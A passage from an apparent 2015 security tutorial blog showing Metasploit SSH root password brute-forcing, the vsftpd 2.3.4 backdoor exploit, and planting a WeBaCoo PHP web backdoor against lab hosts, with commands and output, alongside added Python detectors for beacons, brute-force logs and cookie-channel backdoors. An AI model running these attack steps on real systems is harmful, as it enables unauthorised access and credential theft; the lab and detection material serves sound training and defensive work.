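    {"type": 3, "pid": 2744, "image": "iexplore.exe", "dst_ip": "192.168.122.115", "dst_port": 8080},
    {"type": 1, "pid": 3376, "image": "notepad.exe", "ppid": 2744, "parent_image": "iexplore.exe"},
    {"type": 3, "pid": 3376, "image": "notepad.exe", "dst_ip": "192.168.122.115", "dst_port": 4444},
    {"type": 1, "pid": 4120, "image": "cmd.exe", "ppid": 3376, "parent_image": "notepad.exe"},
    # benign: the user opened Notepad from the desktop and it never touches the network
    {"type": 1, "pid": 4100, "image": "notepad.exe", "ppid": 1200, "parent_image": "explorer.exe"},
]


def detect_browser_spawned_beacons(events):
    """Flag processes spawned (directly or transitively) by a browser that then
    open an outbound connection.  Lineage, not the port number, is the signal:
    the listener port is attacker-chosen and 4444 is merely Metasploit's default."""
    lineage = {}   # pid -> human-readable ancestry string
    alerts = []
    for ev in events:
        if ev["type"] == 1:
            parent = ev["parent_image"].lower()
            image = ev["image"].lower()
            if parent in BROWSERS and image in UNEXPECTED_CHILDREN:
                lineage[ev["pid"]] = f"{parent}({ev['ppid']}) -> {image}({ev['pid']})"
                alerts.append({"severity": "medium", "pid": ev["pid"],
                               "detail": "browser spawned unexpected child: " + lineage[ev["pid"]]})
            elif ev["ppid"] in lineage:
                # descendants of a suspect process inherit suspicion (e.g. cmd.exe from a shell)
                lineage[ev["pid"]] = lineage[ev["ppid"]] + f" -> {image}({ev['pid']})"
                alerts.append({"severity": "medium", "pid": ev["pid"],
                               "detail": "descendant of browser-spawned process: " + lineage[ev["pid"]]})
        elif ev["type"] == 3 and ev["pid"] in lineage:
            alerts.append({"severity": "high", "pid": ev["pid"],
                           "detail": f"outbound {ev['dst_ip']}:{ev['dst_port']} from {lineage[ev['pid']]}"})
    return alerts


if __name__ == "__main__":
    for alert in detect_browser_spawned_beacons(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["pid"], alert["detail"])
```

With real Sysmon data, Event ID 1 and Event ID 3 map onto types 1 and 3 here, and Event ID 8 (CreateRemoteThread) catches the injection into notepad.exe itself. The browser's own connection to port 8080 is deliberately not flagged: browsers talk to arbitrary ports all day, which is why the rule keys on what the browser's children do rather than on the browser. On the prevention side, both posts require an unpatched IE 8 or the "Initialize and script ActiveX controls not marked as safe" setting enabled, so patch level and enforced zone settings remove the precondition.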
<br />
<br /></div>
Hack SSH Server in RHEL 7 Using Metasploit in Kali Linux (Shabbir Rangwala, published 2015-06-17, updated 2015-06-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will crack the password of the 'root' user on an SSH server running on RHEL 7, using Metasploit in Kali Linux.<br />
<br />
SSH Server Name: meru.mycompany.com<br />
SSH Server IP Address: 192.168.122.1 <br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
<br />
3) <span style="color: blue;">Check database status </span><br />
msf > <b>db_status</b><br />
[*] postgresql connected to msf3<br />
<br />
<br />
4) <span style="color: blue;">Perform an nmap scan through Metasploit's database extension.</span> The details found by the scan are added automatically to the Metasploit database. <br />
msf ><b> db_nmap -sS 192.168.122.1 -p 22</b><br />
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST<br />
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)<br />
[*] Nmap: Host is up (0.0024s latency).<br />
[*] Nmap: PORT STATE SERVICE<br />
<span style="color: red;">[*] Nmap: 22/tcp open ssh</span><br />
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)<br />
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds<br />
<br />5) <span style="color: blue;">Search for the module.</span><br />
msf > <b>search ssh</b><br />
<span style="color: red;">auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner</span><br />
<br />
6) <span style="color: blue;">Select the module.</span><br />
msf > <b>use auxiliary/scanner/ssh/ssh_login</b><br />
<br />
7) <span style="color: blue;">View options.</span> <br />
msf auxiliary(ssh_login) > <b>show options</b><br />
<br />
Module options (auxiliary/scanner/ssh/ssh_login):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
BLANK_PASSWORDS false no Try blank passwords for all users<br />
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5<br />
DB_ALL_CREDS false no Try each user/password couple stored in the current database<br />
DB_ALL_PASS false no Add all passwords in the current database to the list<br />
DB_ALL_USERS false no Add all users in the current database to the list<br />
PASSWORD no A specific password to authenticate with<br />
<span style="color: red;"> PASS_FILE no File containing passwords, one per line</span><br />
<span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span><br />
RPORT 22 yes The target port<br />
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host<br />
THREADS 1 yes The number of concurrent threads<br />
<span style="color: red;"> USERNAME no A specific username to authenticate as</span><br />
USERPASS_FILE no File containing users and passwords separated by space, one pair per line<br />
USER_AS_PASS false no Try the username as the password for all users<br />
USER_FILE no File containing usernames, one per line<br />
VERBOSE true yes Whether to print output for all attempts<br />
<br />
8) <span style="color: blue;">Set options. </span><br />
msf auxiliary(ssh_login) > <b>set RHOSTS 192.168.122.1</b><br />
RHOSTS => 192.168.122.1<br />
<br />
msf auxiliary(ssh_login) > <b>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</b><br />
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt<br />
<br />
msf auxiliary(ssh_login) > <b>set USERNAME root</b><br />
USERNAME => root<br />
<br />
9) <span style="color: blue;">Execute the module</span><br />
msf auxiliary(ssh_login) > <b>run</b><br />
<br />
[*] 192.168.122.1:22 SSH - Starting bruteforce<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:password'<br />
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'<br />
<span style="color: red;">[+] 192.168.122.1:22 SSH - Success: 'root:<i><b>adminpasswd</b></i>' 'uid=0(root) gid=0(root) </span>groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '<br />
[*] Scanned 1 of 1 hosts (100% complete)<br />
[*] Auxiliary module execution completed<br />
<br />
msf auxiliary(ssh_login) > <b>id</b><br />
[*] exec: id<br />
uid=0(root) gid=0(root) groups=0(root)<br />
<br />
msf auxiliary(ssh_login) > <b>cat /etc/shadow</b><br />
<br />
<br />
<br />
As seen above, we have got a root shell on the victim machine.<br />
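The module output above, a run of Failed lines for root followed by a Success, is exactly the pattern the server side records in its authentication log (/var/log/secure on RHEL). Added here as an example that is not part of the post: a Python detector for that pattern over constructed sshd log lines. The excerpt is invented (the hostname meru matches the post, but PIDs, ports and timestamps are made up), and the policy of five failures within sixty seconds is an assumption of the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the password/publickey result lines sshd writes to the system log
SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
)

# Constructed log excerpt: five quick failures for root followed by a success,
# then ordinary activity from another host.
SAMPLE_LOG = """\
Jun 17 14:01:02 meru sshd[2201]: Failed password for root from 192.168.122.115 port 50122 ssh2
Jun 17 14:01:03 meru sshd[2203]: Failed password for root from 192.168.122.115 port 50124 ssh2
Jun 17 14:01:03 meru sshd[2205]: Failed password for root from 192.168.122.115 port 50126 ssh2
Jun 17 14:01:04 meru sshd[2207]: Failed password for root from 192.168.122.115 port 50128 ssh2
Jun 17 14:01:04 meru sshd[2209]: Failed password for root from 192.168.122.115 port 50130 ssh2
Jun 17 14:01:05 meru sshd[2211]: Accepted password for root from 192.168.122.115 port 50132 ssh2
Jun 17 14:03:30 meru sshd[2290]: Failed password for alice from 192.168.122.50 port 41000 ssh2
Jun 17 14:03:41 meru sshd[2292]: Accepted publickey for alice from 192.168.122.50 port 41002 ssh2
Jun 17 14:03:55 meru sshd[2295]: pam_unix(sshd:session): session opened for user alice by (uid=0)
""".splitlines()


def parse_sshd_line(line):
    """Return a dict for a Failed/Accepted line, or None for anything else."""
    m = SSHD_LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Per source IP: count failures inside a sliding window, and record a
    login that succeeds after the threshold was reached (the post's pattern)."""
    per_ip = defaultdict(lambda: {"failures": 0, "bruteforce": False,
                                  "success_after_bruteforce": None, "users": set()})
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    for line in lines:
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        state = per_ip[ev["ip"]]
        state["users"].add(ev["user"])
        window_fails = recent[ev["ip"]]
        while window_fails and ev["ts"] - window_fails[0] > window:
            window_fails.popleft()
        if ev["result"] == "Failed":
            state["failures"] += 1
            window_fails.append(ev["ts"])
            if len(window_fails) >= threshold:
                state["bruteforce"] = True
        elif state["bruteforce"]:
            state["success_after_bruteforce"] = ev["user"]
    return {ip: {**s, "users": sorted(s["users"])} for ip, s in per_ip.items()}


if __name__ == "__main__":
    for ip, state in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, state)
```

The success-after-failures field is the one worth paging on: a burst of failures alone is background noise on any Internet-facing sshd, but a success from the same source means the wordlist contained the password. On the server, `PermitRootLogin no` and `PasswordAuthentication no` in sshd_config remove the attack surface the module relies on, and fail2ban applies the same sliding-window count to block the source automatically.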
<br />
<br />
<br /></div>
Metasploit: Using database to store results (Shabbir Rangwala, published 2015-06-17, updated 2015-06-21)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
It is good practice to store the results of a penetration test in a database. This helps us build a knowledge base of the <span style="color: red;">hosts</span> scanned, the <span style="color: red;">services</span> running on those hosts, and the <span style="color: red;">vulnerabilities</span> found on them. Metasploit uses PostgreSQL as its default database.<br />
<br /><br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
Configuring Metasploit...<br />
Creating metasploit database user 'msf3'...<br />
Creating metasploit database 'msf3'...<br />
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).<br />
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).<br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
<br />
3) <span style="color: blue;">Check database status </span><br />
msf > <b>db_status</b><br />
[*] postgresql connected to msf3<br />
<br />
<br />
4) <span style="color: blue;">Perform an nmap scan through Metasploit's database extension.</span> The details found by the scan are added automatically to the Metasploit database. <br />
msf > <b>db_nmap -sV 192.168.122.73</b><br />
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 11:12 IST<br />
[*] Nmap: Nmap scan report for 192.168.122.73<br />
[*] Nmap: Host is up (0.00030s latency).<br />
[*] Nmap: Not shown: 977 closed ports<br />
[*] Nmap: PORT STATE SERVICE VERSION<br />
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4<br />
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)<br />
[*] Nmap: 23/tcp open telnet Linux telnetd<br />
[*] Nmap: 25/tcp open smtp Postfix smtpd<br />
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2<br />
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)<br />
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)<br />
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)<br />
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)<br />
[*] Nmap: 512/tcp open exec?<br />
[*] Nmap: 513/tcp open login<br />
[*] Nmap: 514/tcp open tcpwrapped<br />
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry<br />
[*] Nmap: 1524/tcp open shell Metasploitable root shell<br />
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)<br />
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1<br />
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5<br />
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7<br />
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)<br />
[*] Nmap: 6000/tcp open X11 (access denied)<br />
[*] Nmap: 6667/tcp open irc Unreal ircd<br />
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)<br />
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1<br />
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel<br />
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds<br />
msf > <br />
<br />
msf ><b> db_nmap -O 192.168.122.73</b><br />
<br />
<br />
4) <span style="color: blue;">Verify the hosts present in the database.</span><br />
msf > <b>hosts</b><br />
<br />
Hosts<br />
=====<br />
<br />
address mac name os_name os_flavor os_sp purpose info comments<br />
------- --- ---- ------- --------- ----- ------- ---- --------<br />
192.168.122.73 00:0c:29:fa:dd:2a Linux 2.6.X server <br />
<br />
<br />
5) <span style="color: blue;">View the services available on the hosts.</span><br />
msf > <b>services</b><br />
<br />
Services<br />
========<br />
<br />
host port proto name state info<br />
---- ---- ----- ---- ----- ----<br />
192.168.122.73 21 tcp ftp open vsftpd 2.3.4<br />
192.168.122.73 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0<br />
192.168.122.73 23 tcp telnet open Linux telnetd<br />
192.168.122.73 25 tcp smtp open Postfix smtpd<br />
192.168.122.73 53 tcp domain open ISC BIND 9.4.2<br />
192.168.122.73 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2<br />
192.168.122.73 111 tcp rpcbind open 2 RPC #100000<br />
192.168.122.73 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP<br />
192.168.122.73 445 tcp microsoft-ds open Samba smbd 3.X workgroup: WORKGROUP<br />
192.168.122.73 512 tcp exec open <br />
192.168.122.73 513 tcp login open <br />
192.168.122.73 514 tcp shell open <br />
192.168.122.73 1099 tcp rmiregistry open GNU Classpath grmiregistry<br />
192.168.122.73 1524 tcp ingreslock open Metasploitable root shell<br />
192.168.122.73 2049 tcp nfs open 2-4 RPC #100003<br />
192.168.122.73 2121 tcp ccproxy-ftp open ProFTPD 1.3.1<br />
192.168.122.73 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5<br />
192.168.122.73 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7<br />
192.168.122.73 5900 tcp vnc open VNC protocol 3.3<br />
192.168.122.73 6000 tcp x11 open access denied<br />
192.168.122.73 6667 tcp irc open Unreal ircd<br />
192.168.122.73 8009 tcp ajp13 open Apache Jserv Protocol v1.3<br />
192.168.122.73 8180 tcp unknown open Apache Tomcat/Coyote JSP engine 1.1<br />
<br />
msf > <br />
<br />
6) <span style="color: blue;">Find and exploit 'vsftpd' vulnerability</span><br />
msf > <b>search vsftpd</b><br />
msf > <b>use exploit/unix/ftp/vsftpd_234_backdoor </b><br />
msf exploit(vsftpd_234_backdoor) > <b>show options</b><br />
msf exploit(vsftpd_234_backdoor) > <b>set RHOST 192.168.122.73</b><br />
msf exploit(vsftpd_234_backdoor) > <b>exploit</b><br />
<br />
<br />
7) <span style="color: blue;">View vulnerabilities in database</span><br />
msf > <b>vulns</b><br />
[*] Time: 2015-06-17 06:42:50 UTC Vuln: host=192.168.122.73 <span style="color: red;">name=VSFTPD v2.3.4 Backdoor Command Execution</span> refs=OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html <br />
<br />
<br />
<br />
8) <span style="color: blue;">Generate XML report.</span> <br />
msf > <b>db_export -f xml /root/report.xml</b><br />
[*] Starting export of workspace default to /root/report.xml [ xml ]...<br />
[*] >> Starting export of report<br />
[*] >> Starting export of hosts<br />
[*] >> Starting export of events<br />
[*] >> Starting export of services<br />
[*] >> Starting export of web sites<br />
[*] >> Starting export of web pages<br />
[*] >> Starting export of web forms<br />
[*] >> Starting export of web vulns<br />
[*] >> Starting export of module details<br />
[*] >> Finished export of report<br />
[*] Finished export of workspace default to /root/report.xml [ xml ]... <br />
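The `services` and `vulns` outputs shown in steps 5 and 7 are plain text, so the knowledge base the post describes can be consumed by scripts without the XML export. Added here as an example that is not part of the post: a Python parser for both layouts that builds a per-host inventory and attributes each vuln record to a port. The sample text is a constructed excerpt in the same column layout as the output above, and the port-attribution heuristic (banner tokens contained in the vuln name) is this example's own, not Metasploit's logic.

```python
import re

# Constructed excerpt in the layout of msfconsole's `services` table.  The last
# column (info) may be empty or contain spaces, so it is parsed as "the rest".
SERVICES_OUTPUT = """\
Services
========

host            port  proto  name        state  info
----            ----  -----  ----        -----  ----
192.168.122.73  21    tcp    ftp         open   vsftpd 2.3.4
192.168.122.73  22    tcp    ssh         open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.122.73  512   tcp    exec        open
192.168.122.73  1524  tcp    ingreslock  open   Metasploitable root shell
"""

# One line in the layout of the `vulns` output from step 7.
VULNS_OUTPUT = """\
[*] Time: 2015-06-17 06:42:50 UTC Vuln: host=192.168.122.73 name=VSFTPD v2.3.4 Backdoor Command Execution refs=OSVDB-73573,URL-http://pastebin.com/AetT9sS5
"""

SERVICE_LINE = re.compile(
    r"^(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<proto>\S+)\s+"
    r"(?P<name>\S+)\s+(?P<state>\S+)\s*(?P<info>.*)$")
VULN_LINE = re.compile(r"Vuln: host=(?P<host>\S+) name=(?P<name>.+?) refs=(?P<refs>\S+)")


def parse_services(text):
    services = []
    for line in text.splitlines():
        m = SERVICE_LINE.match(line.strip())
        if m:   # header, separator and blank lines do not start with an address
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["info"] = rec["info"].strip()
            services.append(rec)
    return services


def parse_vulns(text):
    vulns = []
    for line in text.splitlines():
        m = VULN_LINE.search(line)
        if m:
            vulns.append({"host": m["host"], "name": m["name"].strip(),
                          "refs": m["refs"].split(",")})
    return vulns


def attribute_vuln_to_port(vuln, services):
    """Heuristic of this example, not Metasploit logic: a vuln record carries
    no port, so attribute it to the service whose banner tokens all appear in
    the vuln name ("vsftpd 2.3.4" is contained in "VSFTPD v2.3.4 Backdoor ...")."""
    vuln_tokens = {re.sub(r"^v(?=\d)", "", t.lower()) for t in vuln["name"].split()}
    for svc in services:
        if svc["host"] == vuln["host"] and svc["info"]:
            banner_tokens = {t.lower() for t in svc["info"].split()}
            if banner_tokens <= vuln_tokens:
                return svc["port"]
    return None


def build_inventory(services, vulns):
    """host -> {"services": [...], "vulns": [...]} with each vuln tagged by port."""
    inventory = {}
    for svc in services:
        inventory.setdefault(svc["host"], {"services": [], "vulns": []})["services"].append(svc)
    for vuln in vulns:
        entry = inventory.setdefault(vuln["host"], {"services": [], "vulns": []})
        entry["vulns"].append({**vuln, "port": attribute_vuln_to_port(vuln, services)})
    return inventory


if __name__ == "__main__":
    inv = build_inventory(parse_services(SERVICES_OUTPUT), parse_vulns(VULNS_OUTPUT))
    for host, entry in inv.items():
        print(host, len(entry["services"]), "services,", len(entry["vulns"]), "vulns")
        for v in entry["vulns"]:
            print("  port", v["port"], v["name"], v["refs"][0])
```

Keeping one inventory per scan date and diffing them is what turns the database into the knowledge base the post has in mind: a port that appears between two runs, or a banner that changes, is the finding, and the refs list (OSVDB id and URLs here) gives the ticket something to cite.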
<br />
<br />
<br />
<br /></div>
Web backdoor 'webacoo' in Kali Linux (Shabbir Rangwala, published 2015-06-15, updated 2015-06-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
A backdoor is any program that allows a hacker to connect to a computer without going through the normal authentication process. Once a backdoor program is loaded on a computer, the hacker can come and go at will. Backdoors generally use a covert communication channel to hide their traffic from firewalls and intrusion detection systems.<br />
<br />
<span style="background-color: white; text-align: justify;">WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, which provides the hacker with a remote terminal on the web server and communicates over HTTP. WeBaCoo uses HTTP cookies as a covert communication channel. The commands to be executed on the victim server and the response are sent using encrypted cookies in HTTP request and HTTP response headers.</span><br />
<br />
<span style="background-color: white; text-align: justify;">WeBaCoo is a post exploitation tool. The hacker has to first gain access to the victim web server in order to upload the backdoor code. </span><br />
<br />
<br />
On the Kali Linux machine, perform the following steps: <br />
<br />1) Generate the backdoor code.<br />
root@kali:~# <b>webacoo -g -o backdoor.php</b><br />
<br />
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit<br />
Copyright (C) 2011-2012 Anestis Bechtsoudis<br />
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }<br />
<br />
<span style="color: red;">[+] Backdoor file "backdoor.php" created.</span><br />
<br />
<br />
<br />
2) Copy the file '<b>backdoor.php</b>' to the compromised web server.<br />
<br />
<br />
3) Connect to the compromised web server.<br />
root@kali:~# <b>webacoo -t -u http://meru.mycompany.com/backdoor.php</b><br />
<br />
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit<br />
Copyright (C) 2011-2012 Anestis Bechtsoudis<br />
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }<br />
<br />
[+] Connecting to remote server as...<br />
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0<br />
<br />
[*] Type 'load' to use an extension module.<br />
[*] Type ':<cmd>' to run local OS commands.<br />
[*] Type 'exit' to quit terminal.<br />
<br />
webacoo$ <b>id</b><br />
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0<br />
<br />
<br />
<br />
On the Kali Linux machine, we capture the communication with the victim web server in Wireshark: select the <b>Network Interface</b>, <b>start</b> the capture and set the display filter to <b>http</b>.<br />
<br />
The screenshot below shows the HTTP request to the victim web server. The command to be executed on the victim is carried as an encoded cookie value in the Cookie header.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLyh_PVMVE1uzkoVNPgHlDOtonG7l9oMTRJ6RG1dBRVkbrbHhHp-fj10bMTykPBbtKSkEbJO3tPTyAhaY1fD-NsouRzp7aDbD3qTU-z38edLc1Mw4zW34hHNL0p_HEoT3boQNSx4KErEd/s1600/Screenshot+from+2015-06-15+12%253A03%253A48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigLyh_PVMVE1uzkoVNPgHlDOtonG7l9oMTRJ6RG1dBRVkbrbHhHp-fj10bMTykPBbtKSkEbJO3tPTyAhaY1fD-NsouRzp7aDbD3qTU-z38edLc1Mw4zW34hHNL0p_HEoT3boQNSx4KErEd/s640/Screenshot+from+2015-06-15+12%253A03%253A48.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
The screenshot below shows the HTTP response from the victim web server.<br />
The output of the command executed on the victim is returned as an encoded cookie value in the Set-Cookie header.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrYFPrZ9ZyKjpGDjD0N6DYw7AIH7Z8-zyUKr0D8QIF4FWDEcokKwpPTtmkw_H4JsB8D_lNqD5N9BT8CwryHlr_I21aKjitXFwW0Xkxg3FkWeIqQazQWCs2d0p6D_D2DvctmozImmc7oyXz/s1600/Screenshot+from+2015-06-15+12%253A00%253A52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrYFPrZ9ZyKjpGDjD0N6DYw7AIH7Z8-zyUKr0D8QIF4FWDEcokKwpPTtmkw_H4JsB8D_lNqD5N9BT8CwryHlr_I21aKjitXFwW0Xkxg3FkWeIqQazQWCs2d0p6D_D2DvctmozImmc7oyXz/s640/Screenshot+from+2015-06-15+12%253A00%253A52.png" width="640" /></a></div>
<br />
<br />
<br />
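A detection-side complement to the Wireshark screenshots, as an added Python example that is not part of the original post or of WeBaCoo: a heuristic that walks captured HTTP headers and flags cookie values which decode as base64 into command-like text. The sample exchanges, and the cookie names <b>cm</b> and <b>data</b> in them, are constructed for the illustration and are not WeBaCoo's wire format; the point is the channel class (encoded commands in Cookie, encoded output in Set-Cookie), which is what a defender hunts for.<br />

```python
import base64
import binascii
import re
import string

# Constructed sample traffic, not a real capture: one ordinary exchange and one
# in which a cookie carries a base64-encoded shell command and its output.
# The cookie names "cm" and "data" are made up for this illustration.
SAMPLE_EXCHANGES = [
    (
        "GET /index.php HTTP/1.1\r\nHost: meru.mycompany.com\r\n"
        "Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5\r\n\r\n",
        "HTTP/1.1 200 OK\r\nSet-Cookie: lang=en; Path=/\r\n"
        "Content-Type: text/html\r\n\r\n",
    ),
    (
        "GET /backdoor.php HTTP/1.1\r\nHost: meru.mycompany.com\r\n"
        "Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5; cm="
        + base64.b64encode(b"uname -a; id").decode() + "\r\n\r\n",
        "HTTP/1.1 200 OK\r\nSet-Cookie: data="
        + base64.b64encode(
            b"Linux meru 3.10.0 x86_64\nuid=48(apache) gid=48(apache)\n"
        ).decode()
        + "; Path=/\r\nContent-Type: text/html\r\n\r\n",
    ),
]

PRINTABLE = set(string.printable.encode())
SHELL_WORDS = re.compile(r"\b(id|whoami|uname|cat|ls|wget|curl|nc|sh|bash|uid=\d+)\b")


def cookie_pairs(headers, header_name):
    """Yield (name, value) for every cookie in the given Cookie/Set-Cookie headers.

    A Cookie header carries many name=value pairs; a Set-Cookie header carries
    one pair followed by attributes (Path, Expires, ...), which are dropped.
    """
    wanted = header_name.lower() + ":"
    for line in headers.split("\r\n"):
        if not line.lower().startswith(wanted):
            continue
        body = line.split(":", 1)[1]
        parts = body.split(";") if wanted == "cookie:" else [body.split(";")[0]]
        for part in parts:
            if "=" in part:
                name, value = part.strip().split("=", 1)
                yield name, value


def decode_if_base64_text(value):
    """Return the decoded bytes if value is valid base64 of printable text, else None.

    Session identifiers and short flags fail the length or strict-padding
    checks, so ordinary cookies do not decode "by accident".
    """
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(b in PRINTABLE for b in raw):
        return raw
    return None


def find_cookie_channels(exchanges):
    """Flag cookies whose decoded content looks like a command or command output.

    Returns a list of (exchange_index, side, cookie_name, decoded_text).
    """
    findings = []
    for index, (request, response) in enumerate(exchanges):
        sides = (("request", request, "Cookie"), ("response", response, "Set-Cookie"))
        for side, headers, header_name in sides:
            for name, value in cookie_pairs(headers, header_name):
                raw = decode_if_base64_text(value)
                if raw is not None and SHELL_WORDS.search(raw.decode("ascii")):
                    findings.append((index, side, name, raw.decode("ascii")))
    return findings


if __name__ == "__main__":
    for index, side, name, text in find_cookie_channels(SAMPLE_EXCHANGES):
        print(f"exchange {index} {side}: cookie {name!r} decodes to {text!r}")
```

The same logic can be run over headers exported from Wireshark or a proxy log. Because the backdoor only obfuscates, the decoded text is the attacker's command history and its output, which is exactly what an incident responder needs to scope the compromise.<br />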
<br /></div>
<b>Network Scanning using nmap</b> (Shabbir Rangwala, 2015-06-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
1) <span style="color: blue;">Identify live hosts (ping scan)</span>. The -sn option skips port scanning and only reports which hosts respond. Run as root against targets on the same subnet, nmap sends ARP requests and considers a host up if it replies. For targets on other subnets it sends an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request, so hosts that drop ICMP can still be discovered.<br />
root@kali:~# <b>nmap -sn 192.168.122.1-255</b><br />
